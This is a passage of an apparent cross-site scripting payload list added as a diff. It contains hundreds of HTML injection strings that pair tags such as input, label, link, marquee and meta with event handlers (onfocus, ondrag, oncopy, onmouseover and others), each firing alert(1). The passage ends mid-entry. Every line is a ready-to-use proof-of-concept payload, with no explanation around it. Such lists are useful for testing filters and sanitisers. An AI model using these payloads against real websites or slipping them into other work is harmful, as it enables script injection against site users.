+<input draggable="true" ondragstart="alert(1)">test</input> +<input id=x onfocus=alert(1)> +<input id=x onfocusin=alert(1)> +<input id=x tabindex=1 onactivate=alert(1)></input> +<input id=x tabindex=1 onbeforeactivate=alert(1)></input> +<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> +<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> +<input onauxclick=alert(1)> +<input onbeforecopy=alert(1) value="XSS" autofocus> +<input onbeforecut=alert(1) value="XSS" autofocus> +<input onbeforepaste=alert(1) value="" autofocus> +<input onblur=alert(1) id=x><input autofocus> +<input onchange=alert(1) value=xss> +<input onclick="alert(1)">test</input> +<input oncontextmenu="alert(1)">test</input> +<input oncopy=alert(1) value="XSS" autofocus> +<input oncut=alert(1) value="XSS" autofocus> +<input 
ondblclick="alert(1)">test</input> +<input onfocusout=alert(1) id=x><input autofocus> +<input oninput=alert(1) value=xss> +<input onkeydown="alert(1)" contenteditable>test</input> +<input onkeypress="alert(1)" contenteditable>test</input> +<input onkeyup="alert(1)" contenteditable>test</input> +<input onmousedown="alert(1)">test</input> +<input onmouseenter="alert(1)">test</input> +<input onmouseleave="alert(1)">test</input> +<input onmousemove="alert(1)">test</input> +<input onmouseout="alert(1)">test</input> +<input onmouseover="alert(1)">test</input> +<input onmouseup="alert(1)">test</input> +<input onpaste=alert(1) value="" autofocus> +<input onselect=alert(1) value="XSS" autofocus> +<input type=checkbox id=x onfocus=alert(1)> +<input type=checkbox id=x onfocusin=alert(1)> +<input type=image onloadend=alert(1) src=validimage.png> +<input type=image onloadstart=alert(1) src=validimage.png> +<input type=image src=1 onerror=alert(1)> +<input type=image src=validimage.png onload=alert(1)> +<input type=radio id=x onfocus=alert(1)> +<input type=radio id=x onfocusin=alert(1)> +<ins draggable="true" ondrag="alert(1)">test</ins> +<ins draggable="true" ondragend="alert(1)">test</ins> +<ins draggable="true" ondragenter="alert(1)">test</ins> +<ins draggable="true" ondragleave="alert(1)">test</ins> +<ins draggable="true" ondragstart="alert(1)">test</ins> +<ins id=x tabindex=1 onactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus> +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> +<ins id=x tabindex=1 onfocus=alert(1)></ins> +<ins id=x tabindex=1 onfocusin=alert(1)></ins> +<ins onbeforecopy="alert(1)" contenteditable>test</ins> +<ins onbeforecut="alert(1)" contenteditable>test</ins> +<ins onbeforepaste="alert(1)" contenteditable>test</ins> +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onclick="alert(1)">test</ins> +<ins 
oncontextmenu="alert(1)">test</ins> +<ins oncopy="alert(1)" contenteditable>test</ins> +<ins oncut="alert(1)" contenteditable>test</ins> +<ins ondblclick="alert(1)">test</ins> +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onkeydown="alert(1)" contenteditable>test</ins> +<ins onkeypress="alert(1)" contenteditable>test</ins> +<ins onkeyup="alert(1)" contenteditable>test</ins> +<ins onmousedown="alert(1)">test</ins> +<ins onmouseenter="alert(1)">test</ins> +<ins onmouseleave="alert(1)">test</ins> +<ins onmousemove="alert(1)">test</ins> +<ins onmouseout="alert(1)">test</ins> +<ins onmouseover="alert(1)">test</ins> +<ins onmouseup="alert(1)">test</ins> +<ins onpaste="alert(1)" contenteditable>test</ins> +<isindex draggable="true" ondrag="alert(1)">test</isindex> +<isindex draggable="true" ondragend="alert(1)">test</isindex> +<isindex draggable="true" ondragenter="alert(1)">test</isindex> +<isindex draggable="true" ondragleave="alert(1)">test</isindex> +<isindex draggable="true" ondragstart="alert(1)">test</isindex> +<isindex id=x tabindex=1 onactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> +<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> +<isindex id=x tabindex=1 onfocus=alert(1)></isindex> +<isindex id=x tabindex=1 onfocusin=alert(1)></isindex> +<isindex onbeforecopy="alert(1)" contenteditable>test</isindex> +<isindex onbeforecut="alert(1)" contenteditable>test</isindex> +<isindex onbeforepaste="alert(1)" contenteditable>test</isindex> +<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onclick="alert(1)">test</isindex> +<isindex oncontextmenu="alert(1)">test</isindex> +<isindex oncopy="alert(1)" contenteditable>test</isindex> +<isindex oncut="alert(1)" contenteditable>test</isindex> +<isindex ondblclick="alert(1)">test</isindex> +<isindex onfocusout=alert(1) 
tabindex=1 id=x></isindex><input autofocus> +<isindex onkeydown="alert(1)" contenteditable>test</isindex> +<isindex onkeypress="alert(1)" contenteditable>test</isindex> +<isindex onkeyup="alert(1)" contenteditable>test</isindex> +<isindex onmousedown="alert(1)">test</isindex> +<isindex onmouseenter="alert(1)">test</isindex> +<isindex onmouseleave="alert(1)">test</isindex> +<isindex onmousemove="alert(1)">test</isindex> +<isindex onmouseout="alert(1)">test</isindex> +<isindex onmouseover="alert(1)">test</isindex> +<isindex onmouseup="alert(1)">test</isindex> +<isindex onpaste="alert(1)" contenteditable>test</isindex> +<isindex type=image onload=alert(1) src=validimage.png> +<isindex type=image src=1 onerror=alert(1)> +<kbd draggable="true" ondrag="alert(1)">test</kbd> +<kbd draggable="true" ondragend="alert(1)">test</kbd> +<kbd draggable="true" ondragenter="alert(1)">test</kbd> +<kbd draggable="true" ondragleave="alert(1)">test</kbd> +<kbd draggable="true" ondragstart="alert(1)">test</kbd> +<kbd id=x tabindex=1 onactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> +<kbd id=x tabindex=1 onfocus=alert(1)></kbd> +<kbd id=x tabindex=1 onfocusin=alert(1)></kbd> +<kbd onbeforecopy="alert(1)" contenteditable>test</kbd> +<kbd onbeforecut="alert(1)" contenteditable>test</kbd> +<kbd onbeforepaste="alert(1)" contenteditable>test</kbd> +<kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onclick="alert(1)">test</kbd> +<kbd oncontextmenu="alert(1)">test</kbd> +<kbd oncopy="alert(1)" contenteditable>test</kbd> +<kbd oncut="alert(1)" contenteditable>test</kbd> +<kbd ondblclick="alert(1)">test</kbd> +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onkeydown="alert(1)" contenteditable>test</kbd> +<kbd onkeypress="alert(1)" contenteditable>test</kbd> +<kbd onkeyup="alert(1)" 
contenteditable>test</kbd> +<kbd onmousedown="alert(1)">test</kbd> +<kbd onmouseenter="alert(1)">test</kbd> +<kbd onmouseleave="alert(1)">test</kbd> +<kbd onmousemove="alert(1)">test</kbd> +<kbd onmouseout="alert(1)">test</kbd> +<kbd onmouseover="alert(1)">test</kbd> +<kbd onmouseup="alert(1)">test</kbd> +<kbd onpaste="alert(1)" contenteditable>test</kbd> +<keygen autofocus onfocus=alert(1)> +<keygen autofocus onfocusin=alert(1)> +<keygen draggable="true" ondrag="alert(1)">test</keygen> +<keygen draggable="true" ondragend="alert(1)">test</keygen> +<keygen draggable="true" ondragenter="alert(1)">test</keygen> +<keygen draggable="true" ondragleave="alert(1)">test</keygen> +<keygen draggable="true" ondragstart="alert(1)">test</keygen> +<keygen id=x onfocus=alert(1)> +<keygen id=x onfocusin=alert(1)> +<keygen id=x tabindex=1 onactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> +<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> +<keygen onbeforecopy="alert(1)" contenteditable>test</keygen> +<keygen onbeforecut="alert(1)" contenteditable>test</keygen> +<keygen onbeforepaste="alert(1)" contenteditable>test</keygen> +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onclick="alert(1)">test</keygen> +<keygen oncontextmenu="alert(1)">test</keygen> +<keygen oncopy="alert(1)" contenteditable>test</keygen> +<keygen oncut="alert(1)" contenteditable>test</keygen> +<keygen ondblclick="alert(1)">test</keygen> +<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onkeydown="alert(1)" contenteditable>test</keygen> +<keygen onkeypress="alert(1)" contenteditable>test</keygen> +<keygen onkeyup="alert(1)" contenteditable>test</keygen> +<keygen onmousedown="alert(1)">test</keygen> +<keygen onmouseenter="alert(1)">test</keygen> +<keygen onmouseleave="alert(1)">test</keygen> +<keygen 
onmousemove="alert(1)">test</keygen> +<keygen onmouseout="alert(1)">test</keygen> +<keygen onmouseover="alert(1)">test</keygen> +<keygen onmouseup="alert(1)">test</keygen> +<keygen onpaste="alert(1)" contenteditable>test</keygen> +<label draggable="true" ondrag="alert(1)">test</label> +<label draggable="true" ondragend="alert(1)">test</label> +<label draggable="true" ondragenter="alert(1)">test</label> +<label draggable="true" ondragleave="alert(1)">test</label> +<label draggable="true" ondragstart="alert(1)">test</label> +<label id=x tabindex=1 onactivate=alert(1)></label> +<label id=x tabindex=1 onbeforeactivate=alert(1)></label> +<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> +<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> +<label id=x tabindex=1 onfocus=alert(1)></label> +<label id=x tabindex=1 onfocusin=alert(1)></label> +<label onbeforecopy="alert(1)" contenteditable>test</label> +<label onbeforecut="alert(1)" contenteditable>test</label> +<label onbeforepaste="alert(1)" contenteditable>test</label> +<label onblur=alert(1) tabindex=1 id=x></label><input autofocus> +<label onclick="alert(1)">test</label> +<label oncontextmenu="alert(1)">test</label> +<label oncopy="alert(1)" contenteditable>test</label> +<label oncut="alert(1)" contenteditable>test</label> +<label ondblclick="alert(1)">test</label> +<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> +<label onkeydown="alert(1)" contenteditable>test</label> +<label onkeypress="alert(1)" contenteditable>test</label> +<label onkeyup="alert(1)" contenteditable>test</label> +<label onmousedown="alert(1)">test</label> +<label onmouseenter="alert(1)">test</label> +<label onmouseleave="alert(1)">test</label> +<label onmousemove="alert(1)">test</label> +<label onmouseout="alert(1)">test</label> +<label onmouseover="alert(1)">test</label> +<label onmouseup="alert(1)">test</label> +<label onpaste="alert(1)" contenteditable>test</label> +<legend 
draggable="true" ondrag="alert(1)">test</legend> +<legend draggable="true" ondragend="alert(1)">test</legend> +<legend draggable="true" ondragenter="alert(1)">test</legend> +<legend draggable="true" ondragleave="alert(1)">test</legend> +<legend draggable="true" ondragstart="alert(1)">test</legend> +<legend id=x tabindex=1 onactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> +<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> +<legend id=x tabindex=1 onfocus=alert(1)></legend> +<legend id=x tabindex=1 onfocusin=alert(1)></legend> +<legend onbeforecopy="alert(1)" contenteditable>test</legend> +<legend onbeforecut="alert(1)" contenteditable>test</legend> +<legend onbeforepaste="alert(1)" contenteditable>test</legend> +<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onclick="alert(1)">test</legend> +<legend oncontextmenu="alert(1)">test</legend> +<legend oncopy="alert(1)" contenteditable>test</legend> +<legend oncut="alert(1)" contenteditable>test</legend> +<legend ondblclick="alert(1)">test</legend> +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onkeydown="alert(1)" contenteditable>test</legend> +<legend onkeypress="alert(1)" contenteditable>test</legend> +<legend onkeyup="alert(1)" contenteditable>test</legend> +<legend onmousedown="alert(1)">test</legend> +<legend onmouseenter="alert(1)">test</legend> +<legend onmouseleave="alert(1)">test</legend> +<legend onmousemove="alert(1)">test</legend> +<legend onmouseout="alert(1)">test</legend> +<legend onmouseover="alert(1)">test</legend> +<legend onmouseup="alert(1)">test</legend> +<legend onpaste="alert(1)" contenteditable>test</legend> +<li draggable="true" ondrag="alert(1)">test</li> +<li draggable="true" ondragend="alert(1)">test</li> +<li draggable="true" ondragenter="alert(1)">test</li> +<li draggable="true" 
ondragleave="alert(1)">test</li> +<li draggable="true" ondragstart="alert(1)">test</li> +<li id=x tabindex=1 onactivate=alert(1)></li> +<li id=x tabindex=1 onbeforeactivate=alert(1)></li> +<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> +<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> +<li id=x tabindex=1 onfocus=alert(1)></li> +<li id=x tabindex=1 onfocusin=alert(1)></li> +<li onbeforecopy="alert(1)" contenteditable>test</li> +<li onbeforecut="alert(1)" contenteditable>test</li> +<li onbeforepaste="alert(1)" contenteditable>test</li> +<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> +<li onclick="alert(1)">test</li> +<li oncontextmenu="alert(1)">test</li> +<li oncopy="alert(1)" contenteditable>test</li> +<li oncut="alert(1)" contenteditable>test</li> +<li ondblclick="alert(1)">test</li> +<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> +<li onkeydown="alert(1)" contenteditable>test</li> +<li onkeypress="alert(1)" contenteditable>test</li> +<li onkeyup="alert(1)" contenteditable>test</li> +<li onmousedown="alert(1)">test</li> +<li onmouseenter="alert(1)">test</li> +<li onmouseleave="alert(1)">test</li> +<li onmousemove="alert(1)">test</li> +<li onmouseout="alert(1)">test</li> +<li onmouseover="alert(1)">test</li> +<li onmouseup="alert(1)">test</li> +<li onpaste="alert(1)" contenteditable>test</li> +<link draggable="true" ondrag="alert(1)">test</link> +<link draggable="true" ondragend="alert(1)">test</link> +<link draggable="true" ondragenter="alert(1)">test</link> +<link draggable="true" ondragleave="alert(1)">test</link> +<link draggable="true" ondragstart="alert(1)">test</link> +<link href=validstyles.css rel=stylesheet onload=alert(1)> +<link id=x tabindex=1 onactivate=alert(1)></link> +<link id=x tabindex=1 onbeforeactivate=alert(1)></link> +<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> +<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> 
+<link onbeforecopy="alert(1)" contenteditable>test</link> +<link onbeforecut="alert(1)" contenteditable>test</link> +<link onbeforepaste="alert(1)" contenteditable>test</link> +<link onblur=alert(1) tabindex=1 id=x></link><input autofocus> +<link onclick="alert(1)">test</link> +<link oncontextmenu="alert(1)">test</link> +<link oncopy="alert(1)" contenteditable>test</link> +<link oncut="alert(1)" contenteditable>test</link> +<link ondblclick="alert(1)">test</link> +<link onfocus=alert(1) id=x tabindex=1 style=display:block> +<link onfocusin=alert(1) id=x tabindex=1 style=display:block> +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> +<link onkeydown="alert(1)" contenteditable>test</link> +<link onkeypress="alert(1)" contenteditable>test</link> +<link onkeyup="alert(1)" contenteditable>test</link> +<link onmousedown="alert(1)">test</link> +<link onmouseenter="alert(1)">test</link> +<link onmouseleave="alert(1)">test</link> +<link onmousemove="alert(1)">test</link> +<link onmouseout="alert(1)">test</link> +<link onmouseover="alert(1)">test</link> +<link onmouseup="alert(1)">test</link> +<link onpaste="alert(1)" contenteditable>test</link> +<link onreadystatechange=alert(1) rel=stylesheet href=1> +<link rel=stylesheet href=1 onerror=alert(1)> +<listing draggable="true" ondrag="alert(1)">test</listing> +<listing draggable="true" ondragend="alert(1)">test</listing> +<listing draggable="true" ondragenter="alert(1)">test</listing> +<listing draggable="true" ondragleave="alert(1)">test</listing> +<listing draggable="true" ondragstart="alert(1)">test</listing> +<listing id=x tabindex=1 onactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> +<listing id=x tabindex=1 onfocus=alert(1)></listing> +<listing id=x tabindex=1 onfocusin=alert(1)></listing> 
+<listing onbeforecopy="alert(1)" contenteditable>test</listing> +<listing onbeforecut="alert(1)" contenteditable>test</listing> +<listing onbeforepaste="alert(1)" contenteditable>test</listing> +<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onclick="alert(1)">test</listing> +<listing oncontextmenu="alert(1)">test</listing> +<listing oncopy="alert(1)" contenteditable>test</listing> +<listing oncut="alert(1)" contenteditable>test</listing> +<listing ondblclick="alert(1)">test</listing> +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onkeydown="alert(1)" contenteditable>test</listing> +<listing onkeypress="alert(1)" contenteditable>test</listing> +<listing onkeyup="alert(1)" contenteditable>test</listing> +<listing onmousedown="alert(1)">test</listing> +<listing onmouseenter="alert(1)">test</listing> +<listing onmouseleave="alert(1)">test</listing> +<listing onmousemove="alert(1)">test</listing> +<listing onmouseout="alert(1)">test</listing> +<listing onmouseover="alert(1)">test</listing> +<listing onmouseup="alert(1)">test</listing> +<listing onpaste="alert(1)" contenteditable>test</listing> +<main draggable="true" ondrag="alert(1)">test</main> +<main draggable="true" ondragend="alert(1)">test</main> +<main draggable="true" ondragenter="alert(1)">test</main> +<main draggable="true" ondragleave="alert(1)">test</main> +<main draggable="true" ondragstart="alert(1)">test</main> +<main id=x tabindex=1 onactivate=alert(1)></main> +<main id=x tabindex=1 onbeforeactivate=alert(1)></main> +<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> +<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> +<main id=x tabindex=1 onfocus=alert(1)></main> +<main id=x tabindex=1 onfocusin=alert(1)></main> +<main onbeforecopy="alert(1)" contenteditable>test</main> +<main onbeforecut="alert(1)" contenteditable>test</main> +<main onbeforepaste="alert(1)" contenteditable>test</main> 
+<main onblur=alert(1) tabindex=1 id=x></main><input autofocus> +<main onclick="alert(1)">test</main> +<main oncontextmenu="alert(1)">test</main> +<main oncopy="alert(1)" contenteditable>test</main> +<main oncut="alert(1)" contenteditable>test</main> +<main ondblclick="alert(1)">test</main> +<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> +<main onkeydown="alert(1)" contenteditable>test</main> +<main onkeypress="alert(1)" contenteditable>test</main> +<main onkeyup="alert(1)" contenteditable>test</main> +<main onmousedown="alert(1)">test</main> +<main onmouseenter="alert(1)">test</main> +<main onmouseleave="alert(1)">test</main> +<main onmousemove="alert(1)">test</main> +<main onmouseout="alert(1)">test</main> +<main onmouseover="alert(1)">test</main> +<main onmouseup="alert(1)">test</main> +<main onpaste="alert(1)" contenteditable>test</main> +<map draggable="true" ondrag="alert(1)">test</map> +<map draggable="true" ondragend="alert(1)">test</map> +<map draggable="true" ondragenter="alert(1)">test</map> +<map draggable="true" ondragleave="alert(1)">test</map> +<map draggable="true" ondragstart="alert(1)">test</map> +<map id=x tabindex=1 onactivate=alert(1)></map> +<map id=x tabindex=1 onbeforeactivate=alert(1)></map> +<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> +<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> +<map id=x tabindex=1 onfocus=alert(1)></map> +<map id=x tabindex=1 onfocusin=alert(1)></map> +<map onbeforecopy="alert(1)" contenteditable>test</map> +<map onbeforecut="alert(1)" contenteditable>test</map> +<map onbeforepaste="alert(1)" contenteditable>test</map> +<map onblur=alert(1) tabindex=1 id=x></map><input autofocus> +<map onclick="alert(1)">test</map> +<map oncontextmenu="alert(1)">test</map> +<map oncopy="alert(1)" contenteditable>test</map> +<map oncut="alert(1)" contenteditable>test</map> +<map ondblclick="alert(1)">test</map> +<map onfocusout=alert(1) tabindex=1 
id=x></map><input autofocus> +<map onkeydown="alert(1)" contenteditable>test</map> +<map onkeypress="alert(1)" contenteditable>test</map> +<map onkeyup="alert(1)" contenteditable>test</map> +<map onmousedown="alert(1)">test</map> +<map onmouseenter="alert(1)">test</map> +<map onmouseleave="alert(1)">test</map> +<map onmousemove="alert(1)">test</map> +<map onmouseout="alert(1)">test</map> +<map onmouseover="alert(1)">test</map> +<map onmouseup="alert(1)">test</map> +<map onpaste="alert(1)" contenteditable>test</map> +<mark draggable="true" ondrag="alert(1)">test</mark> +<mark draggable="true" ondragend="alert(1)">test</mark> +<mark draggable="true" ondragenter="alert(1)">test</mark> +<mark draggable="true" ondragleave="alert(1)">test</mark> +<mark draggable="true" ondragstart="alert(1)">test</mark> +<mark id=x tabindex=1 onactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> +<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> +<mark id=x tabindex=1 onfocus=alert(1)></mark> +<mark id=x tabindex=1 onfocusin=alert(1)></mark> +<mark onbeforecopy="alert(1)" contenteditable>test</mark> +<mark onbeforecut="alert(1)" contenteditable>test</mark> +<mark onbeforepaste="alert(1)" contenteditable>test</mark> +<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onclick="alert(1)">test</mark> +<mark oncontextmenu="alert(1)">test</mark> +<mark oncopy="alert(1)" contenteditable>test</mark> +<mark oncut="alert(1)" contenteditable>test</mark> +<mark ondblclick="alert(1)">test</mark> +<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onkeydown="alert(1)" contenteditable>test</mark> +<mark onkeypress="alert(1)" contenteditable>test</mark> +<mark onkeyup="alert(1)" contenteditable>test</mark> +<mark onmousedown="alert(1)">test</mark> +<mark onmouseenter="alert(1)">test</mark> +<mark onmouseleave="alert(1)">test</mark> 
+<mark onmousemove="alert(1)">test</mark> +<mark onmouseout="alert(1)">test</mark> +<mark onmouseover="alert(1)">test</mark> +<mark onmouseup="alert(1)">test</mark> +<mark onpaste="alert(1)" contenteditable>test</mark> +<marquee draggable="true" ondrag="alert(1)">test</marquee> +<marquee draggable="true" ondragend="alert(1)">test</marquee> +<marquee draggable="true" ondragenter="alert(1)">test</marquee> +<marquee draggable="true" ondragleave="alert(1)">test</marquee> +<marquee draggable="true" ondragstart="alert(1)">test</marquee> +<marquee id=x tabindex=1 onactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> +<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> +<marquee id=x tabindex=1 onfocus=alert(1)></marquee> +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee> +<marquee onbeforecopy="alert(1)" contenteditable>test</marquee> +<marquee onbeforecut="alert(1)" contenteditable>test</marquee> +<marquee onbeforepaste="alert(1)" contenteditable>test</marquee> +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onclick="alert(1)">test</marquee> +<marquee oncontextmenu="alert(1)">test</marquee> +<marquee oncopy="alert(1)" contenteditable>test</marquee> +<marquee oncut="alert(1)" contenteditable>test</marquee> +<marquee ondblclick="alert(1)">test</marquee> +<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onkeydown="alert(1)" contenteditable>test</marquee> +<marquee onkeypress="alert(1)" contenteditable>test</marquee> +<marquee onkeyup="alert(1)" contenteditable>test</marquee> +<marquee onmousedown="alert(1)">test</marquee> +<marquee onmouseenter="alert(1)">test</marquee> +<marquee onmouseleave="alert(1)">test</marquee> +<marquee onmousemove="alert(1)">test</marquee> +<marquee onmouseout="alert(1)">test</marquee> +<marquee 
onmouseover="alert(1)">test</marquee> +<marquee onmouseup="alert(1)">test</marquee> +<marquee onpaste="alert(1)" contenteditable>test</marquee> +<marquee onstart=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> +<menu draggable="true" ondrag="alert(1)">test</menu> +<menu draggable="true" ondragend="alert(1)">test</menu> +<menu draggable="true" ondragenter="alert(1)">test</menu> +<menu draggable="true" ondragleave="alert(1)">test</menu> +<menu draggable="true" ondragstart="alert(1)">test</menu> +<menu id=x tabindex=1 onactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> +<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> +<menu id=x tabindex=1 onfocus=alert(1)></menu> +<menu id=x tabindex=1 onfocusin=alert(1)></menu> +<menu onbeforecopy="alert(1)" contenteditable>test</menu> +<menu onbeforecut="alert(1)" contenteditable>test</menu> +<menu onbeforepaste="alert(1)" contenteditable>test</menu> +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onclick="alert(1)">test</menu> +<menu oncontextmenu="alert(1)">test</menu> +<menu oncopy="alert(1)" contenteditable>test</menu> +<menu oncut="alert(1)" contenteditable>test</menu> +<menu ondblclick="alert(1)">test</menu> +<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onkeydown="alert(1)" contenteditable>test</menu> +<menu onkeypress="alert(1)" contenteditable>test</menu> +<menu onkeyup="alert(1)" contenteditable>test</menu> +<menu onmousedown="alert(1)">test</menu> +<menu onmouseenter="alert(1)">test</menu> +<menu onmouseleave="alert(1)">test</menu> +<menu onmousemove="alert(1)">test</menu> +<menu onmouseout="alert(1)">test</menu> +<menu onmouseover="alert(1)">test</menu> +<menu onmouseup="alert(1)">test</menu> +<menu onpaste="alert(1)" contenteditable>test</menu> 
+<menuitem draggable="true" ondrag="alert(1)">test</menuitem> +<menuitem draggable="true" ondragend="alert(1)">test</menuitem> +<menuitem draggable="true" ondragenter="alert(1)">test</menuitem> +<menuitem draggable="true" ondragleave="alert(1)">test</menuitem> +<menuitem draggable="true" ondragstart="alert(1)">test</menuitem> +<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> +<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> +<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> +<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> +<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onclick="alert(1)">test</menuitem> +<menuitem oncontextmenu="alert(1)">test</menuitem> +<menuitem oncopy="alert(1)" contenteditable>test</menuitem> +<menuitem oncut="alert(1)" contenteditable>test</menuitem> +<menuitem ondblclick="alert(1)">test</menuitem> +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onkeydown="alert(1)" contenteditable>test</menuitem> +<menuitem onkeypress="alert(1)" contenteditable>test</menuitem> +<menuitem onkeyup="alert(1)" contenteditable>test</menuitem> +<menuitem onmousedown="alert(1)">test</menuitem> +<menuitem onmouseenter="alert(1)">test</menuitem> +<menuitem onmouseleave="alert(1)">test</menuitem> +<menuitem onmousemove="alert(1)">test</menuitem> +<menuitem onmouseout="alert(1)">test</menuitem> +<menuitem onmouseover="alert(1)">test</menuitem> +<menuitem onmouseup="alert(1)">test</menuitem> +<menuitem onpaste="alert(1)" contenteditable>test</menuitem> +<meta draggable="true" 
ondrag="alert(1)">test</meta> +<meta draggable="true" ondragend="alert(1)">test</meta> +<meta draggable="true" ondragenter="alert(1)">test</meta> +<meta draggable="true" ondragleave="alert(1)">test</meta> +<meta draggable="true" ondragstart="alert(1)">test</meta> +<meta id=x tabindex=1 onactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> +<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> +<meta id=x tabindex=1 onfocus=alert(1)></meta> +<meta id=x tabindex=1 onfocusin=alert(1)></meta> +<meta onbeforecopy="alert(1)" contenteditable>test</meta> +<meta onbeforecut="alert(1)" contenteditable>test</meta> +<meta onbeforepaste="alert(1)" contenteditable>test</meta> +<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onclick="alert(1)">test</meta> +<meta oncontextmenu="alert(1)">test</meta> +<meta oncopy="alert(1)" contenteditable>test</meta> +<meta oncut="alert(1)" contenteditable>test</meta> +<meta ondblclick="alert(1)">test</meta> +<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onkeydown="alert(1)" contenteditable>test</meta> +<meta onkeypress="alert(1)" contenteditable>test</meta> +<meta onkeyup="alert(1)" contenteditable>test</meta> +<meta onmousedown="alert(1)">test</meta> +<meta onmouseenter="alert(1)">test</meta> +<meta onmouseleave="alert(1)">test</meta> +<meta onmousemove="alert(1)">test</meta> +<meta onmouseout="alert(1)">test</meta> +<meta onmouseover="alert(1)">test</meta> +<meta onmouseup="alert(1)">test</meta> +<meta onpaste="alert(1)" contenteditable>test</meta> +<meter draggable="true" ondrag="alert(1)">test</meter> +<meter draggable="true" ondragend="alert(1)">test</meter> +<meter draggable="true" ondragenter="alert(1)">test</meter> +<meter draggable="true" ondragleave="alert(1)">test</meter> +<meter draggable="true" 